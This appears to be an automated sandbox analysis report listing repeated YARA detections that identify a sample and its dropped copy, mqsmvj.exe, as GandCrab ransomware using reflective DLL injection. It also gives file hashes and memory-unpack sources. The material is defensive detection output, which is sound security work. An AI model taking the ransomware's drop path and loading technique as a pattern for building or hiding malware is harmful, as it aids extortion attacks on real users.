Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: Gandcrab Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs

Source: IJr8RvvhZ3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 37.3.mqsmvj.exe.3bc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
